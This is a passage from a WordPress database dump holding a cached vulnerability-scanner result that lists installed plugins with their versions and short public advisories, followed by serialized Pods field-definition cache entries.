page.\";s:13:\"introduced_in\";N;}}}s:19:\"jetpack/jetpack.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:6:\"12.0.2\";s:15:\"vulnerabilities\";a:8:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"52d221bd-ae42-435d-a90a-60a5ae530663\";s:5:\"title\";s:62:\"Jetpack < 12.1.1 - Author+ Arbitrary File Manipulation via API\";s:8:\"fixed_in\";s:6:\"12.1.1\";s:11:\"description\";s:228:\"The plugin does not validate uploaded files, allowing users with author roles or above to manipulate existing files on the site, deleting arbitrary files, and in rare cases achieve Remote Code Execution via phar deserialization.\";s:13:\"introduced_in\";s:3:\"1.9\";}i:1;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"4478c8d3-0c7f-43a0-9354-46795e0e6fbc\";s:5:\"title\";s:64:\"Jetpack < 12.8-a.3 - Contributor+ Stored XSS via block attribute\";s:8:\"fixed_in\";s:8:\"12.8-a.3\";s:11:\"description\";s:241:\"The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks\";s:13:\"introduced_in\";N;}i:2;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"cce4ac0a-777f-4dde-b86e-614a224dbf6e\";s:5:\"title\";s:79:\"Jetpack < 12.7 - Improper Authorization via WPCom External Media REST endpoints\";s:8:\"fixed_in\";s:4:\"12.7\";s:11:\"description\";s:379:\"The Jetpack plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the WPCom External Media REST permission_callback function in versions up to and including 12.6.2. This makes it possible for authenticated attackers, with contributor-level access and above, to import external media even without the upload_files capability.\";s:13:\"introduced_in\";N;}i:3;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"01a0ffcd-3bf6-434c-9fd0-d5570ed4f336\";s:5:\"title\";s:78:\"Jetpack < 12.7 - Authenticated(Contributor+) Clickjacking via Iframe Injection\";s:8:\"fixed_in\";s:4:\"12.7\";s:11:\"description\";s:436:\"The Jetpack – WP Security, Backup, Speed, & Growth plugin for WordPress is vulnerable to Clickjacking via iframe injection due to an unknown parameter in all versions up to and including 12.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject iframes in pages that can be used to make users perform actions on untrusted sites.\";s:13:\"introduced_in\";N;}i:4;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"bfed3099-bd41-4988-a76b-2b9349051879\";s:5:\"title\";s:42:\"Jetpack < 13.2.1 - Contributor+ Stored XSS\";s:8:\"fixed_in\";s:6:\"13.2.1\";s:11:\"description\";s:253:\"The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks \";s:13:\"introduced_in\";N;}i:5;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"5649d116-5263-41e9-87b4-1cb71f12d419\";s:5:\"title\";s:79:\"Jetpack < 13.4 - Contributor+ Stored Cross-Site Scripting via wpvideo Shortcode\";s:8:\"fixed_in\";s:4:\"13.4\";s:11:\"description\";s:149:\"The plugin did not properly escape some of its shortcode attributes, allowing users with at least the contributor role to conduct Stored XSS attacks.\";s:13:\"introduced_in\";N;}i:6;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"a984976c-291a-4f68-90d4-e452605ea7d1\";s:5:\"title\";s:70:\"Jetpack < 13.8 - Unauthenticated Arbitrary Block & Shortcode Execution\";s:8:\"fixed_in\";s:4:\"13.8\";s:11:\"description\";s:187:\"The plugin does not ensure that the post created by the Contact Form is only accessible to authorised users, which could allow unauthenticated users to run arbitrary shortcodes and block.\";s:13:\"introduced_in\";N;}i:7;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"15f278f6-0418-4c83-b925-b1a2d8c53e2f\";s:5:\"title\";s:55:\"Jetpack < 13.8, Boost < 3.4.8 - Contributor+ Stored XSS\";s:8:\"fixed_in\";s:4:\"13.8\";s:11:\"description\";s:263:\"The plugins use regexes in the Site Accelerator features when switching image URLs to their CDN counterpart. Unfortunately, some of them may match patterns it shouldn’t, ultimately making it possible for contributor and above users to perform Stored XSS attacks\";s:13:\"introduced_in\";N;}}}s:35:\"jetpack-protect/jetpack-protect.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"1.4.0\";s:15:\"vulnerabilities\";a:0:{}}s:25:\"jet-search/jet-search.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"3.0.3\";s:15:\"vulnerabilities\";a:7:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"1bfc0b63-d877-4705-afe6-5a6f32463b52\";s:5:\"title\";s:78:\"JetSearch < 3.5.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:7:\"3.5.2.1\";s:11:\"description\";s:405:\"The JetSearch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:1;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"d2af90d3-e32a-4cab-861b-1ba02b3b2e7b\";s:5:\"title\";s:78:\"JetSearch < 3.5.7.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:7:\"3.5.7.1\";s:11:\"description\";s:374:\"The JetSearch plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:2;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"ac1e081e-6033-4d4a-bdf4-de677e975c0b\";s:5:\"title\";s:77:\"JetSearch < 3.5.11 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:6:\"3.5.11\";s:11:\"description\";s:377:\"The JetSearch plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.5.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:3;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"b84c580d-3db4-42ef-b42c-918039c4cc9b\";s:5:\"title\";s:52:\"JetSearch < 3.5.10.1 - Unauthenticated SQL Injection\";s:8:\"fixed_in\";s:8:\"3.5.10.1\";s:11:\"description\";s:413:\"The JetSearch plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.5.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\";s:13:\"introduced_in\";N;}i:4;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"25de99f3-df53-4278-924b-1014ae949b23\";s:5:\"title\";s:53:\"JetSearch < 3.5.10.1 - Reflected Cross-Site Scripting\";s:8:\"fixed_in\";s:8:\"3.5.10.1\";s:11:\"description\";s:382:\"The JetSearch plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 3.5.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\";s:13:\"introduced_in\";N;}i:5;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"f0a13e06-bb08-4196-97ba-64cc4c116922\";s:5:\"title\";s:79:\"JetSearch < 3.5.16.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:8:\"3.5.16.1\";s:11:\"description\";s:375:\"The JetSearch plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.5.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:6;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"f9ef13e5-0538-419a-a663-f02d02330eba\";s:5:\"title\";s:52:\"JetSearch < 3.5.17.1 - Unauthenticated SQL Injection\";s:8:\"fixed_in\";s:8:\"3.5.17.1\";s:11:\"description\";s:413:\"The JetSearch plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.5.17 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\";s:13:\"introduced_in\";N;}}}s:39:\"jet-smart-filters/jet-smart-filters.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"3.1.2\";s:15:\"vulnerabilities\";a:4:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"af9bc3c2-9eae-416a-ab70-3c93bac8d231\";s:5:\"title\";s:82:\"JetSmartFilters < 3.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:5:\"3.6.4\";s:11:\"description\";s:380:\"The JetSmartFilters plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:1;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"20c43916-3f84-43fc-a86d-f9ce51399118\";s:5:\"title\";s:84:\"JetSmartFilters < 3.6.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:7:\"3.6.8.1\";s:11:\"description\";s:380:\"The JetSmartFilters plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:2;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"dac91895-50ab-4778-83ed-6672960df866\";s:5:\"title\";s:86:\"JetSmartFilters < 3.6.7.1 - Authenticated (Subscriber+) Sensitive Information Exposure\";s:8:\"fixed_in\";s:7:\"3.6.7.1\";s:11:\"description\";s:274:\"The JetSmartFilters plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data.\";s:13:\"introduced_in\";N;}i:3;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"b4eba781-6da7-4aa7-963a-64b906620c33\";s:5:\"title\";s:57:\"JetSmartFilters < 3.8.1.1 - Unauthenticated SQL Injection\";s:8:\"fixed_in\";s:7:\"3.8.1.1\";s:11:\"description\";s:418:\"The JetSmartFilters plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\";s:13:\"introduced_in\";N;}}}s:21:\"newsletter/plugin.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"8.0.9\";s:15:\"vulnerabilities\";a:8:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"67d1e680-6a32-4718-b0d5-a76e6421a7b8\";s:5:\"title\";s:32:\"Newsletter < 8.2.1 - IP Spoofing\";s:8:\"fixed_in\";s:5:\"8.2.1\";s:11:\"description\";s:303:\"The Newsletter – Send awesome emails from WordPress plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 8.2.0 due to insufficient IP address validation. This makes it possible for unauthenticated attackers to spoof their IP address and bypass the blocklist.\";s:13:\"introduced_in\";N;}i:1;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"eebdf720-ca0f-4d1b-95c8-4fee33cd1590\";s:5:\"title\";s:72:\"Newsletter < 8.3.5 - Unauthenticated Stored Cross-Site Scripting via np1\";s:8:\"fixed_in\";s:5:\"8.3.5\";s:11:\"description\";s:363:\"The Newsletter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \'np1\' parameter in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:2;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"a6582e14-e21e-48e7-9b4c-0044fb199825\";s:5:\"title\";s:38:\"Newsletter < 8.7.1 - Admin+ Stored XSS\";s:8:\"fixed_in\";s:5:\"8.7.1\";s:11:\"description\";s:250:\"The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\";s:13:\"introduced_in\";N;}i:3;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"76937bdd-7ffa-4b5e-ade1-60da095a03a3\";s:5:\"title\";s:55:\"Newsletter < 8.8.2 - Admin+ Stored XSS via Subscription\";s:8:\"fixed_in\";s:5:\"8.8.2\";s:11:\"description\";s:263:\"The plugin does not sanitise and escape some of its Subscription settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\";s:13:\"introduced_in\";N;}i:4;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"19db8521-8dff-48c5-b21a-1001895292e0\";s:5:\"title\";s:47:\"Newsletter < 8.8.5 - Admin+ Stored XSS via Form\";s:8:\"fixed_in\";s:5:\"8.8.5\";s:11:\"description\";s:255:\"The plugin does not sanitise and escape some of its Form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\";s:13:\"introduced_in\";N;}i:5;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"2d96f018-510d-40ab-9e73-76fa44784813\";s:5:\"title\";s:49:\"Newsletter < 8.8.5 - Admin+ Stored XSS via Widget\";s:8:\"fixed_in\";s:5:\"8.8.5\";s:11:\"description\";s:324:\"The plugin does not validate and escape some of its Widget options before outputting them back in a page/post where the block is embed, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\";s:13:\"introduced_in\";N;}i:6;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"70c91b87-9d62-4a72-aa20-949e427b556e\";s:5:\"title\";s:65:\"Newsletter < 9.1.0 - Authenticated (Administrator+) SQL Injection\";s:8:\"fixed_in\";s:5:\"9.1.0\";s:11:\"description\";s:455:\"The Newsletter plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 9.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\";s:13:\"introduced_in\";N;}i:7;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"00921c88-818c-49f2-a291-39a73b46157e\";s:5:\"title\";s:115:\"Newsletter – Send awesome emails from WordPress < 9.1.1 - Cross-Site Request Forgery to Newsletter Unsubscription\";s:8:\"fixed_in\";s:5:\"9.1.1\";s:11:\"description\";s:464:\"The Newsletter – Send awesome emails from WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 9.1.0. This is due to missing or incorrect nonce validation on the hook_newsletter_action() function. This makes it possible for unauthenticated attackers to unsubscribe newsletter subscribers via a forged request granted they can trick a logged-in user into performing an action such as clicking on a link.\";s:13:\"introduced_in\";N;}}}s:51:\"ocean-elementor-widgets/ocean-elementor-widgets.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"1.2.3\";s:15:\"vulnerabilities\";a:0:{}}s:13:\"pods/init.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:7:\"3.2.8.2\";s:15:\"vulnerabilities\";a:0:{}}s:41:\"post-views-counter/post-views-counter.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"1.4.3\";s:15:\"vulnerabilities\";a:1:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"f999eaa3-d447-4cba-a1b4-2dc2eab4c094\";s:5:\"title\";s:82:\"Post Views Counter < 1.4.5 - Cross-Site Request Forgery via save_bulk_post_views()\";s:8:\"fixed_in\";s:5:\"1.4.5\";s:11:\"description\";s:384:\"The plugin is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.4. This is due to missing or incorrect nonce validation on the save_bulk_post_views() function. This makes it possible for unauthenticated attackers to save bulk post views via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.\";s:13:\"introduced_in\";N;}}}s:51:\"wordpress-popular-posts/wordpress-popular-posts.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"6.4.0\";s:15:\"vulnerabilities\";a:1:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"957a0dc2-56e1-4789-bc56-716fab1cbce4\";s:5:\"title\";s:79:\"WordPress Popular Posts < 7.2.0 - Unauthenticated Arbitrary Shortcode Execution\";s:8:\"fixed_in\";s:5:\"7.2.0\";s:11:\"description\";s:268:\"The plugin is vulnerable to arbitrary shortcode execution due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\";s:13:\"introduced_in\";N;}}}}}\";','yes'),(5624233,'_transient_timeout_pods_624172717e985e351a15e10c174b55fd','1782122181','off'),(5624234,'_transient_pods_624172717e985e351a15e10c174b55fd','a:0:{}','off'),(5624235,'_transient_timeout_pods_e354c568ef6965f77b3e344b76ea86a2','1782122181','off'),(5624236,'_transient_pods_e354c568ef6965f77b3e344b76ea86a2','a:27:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidd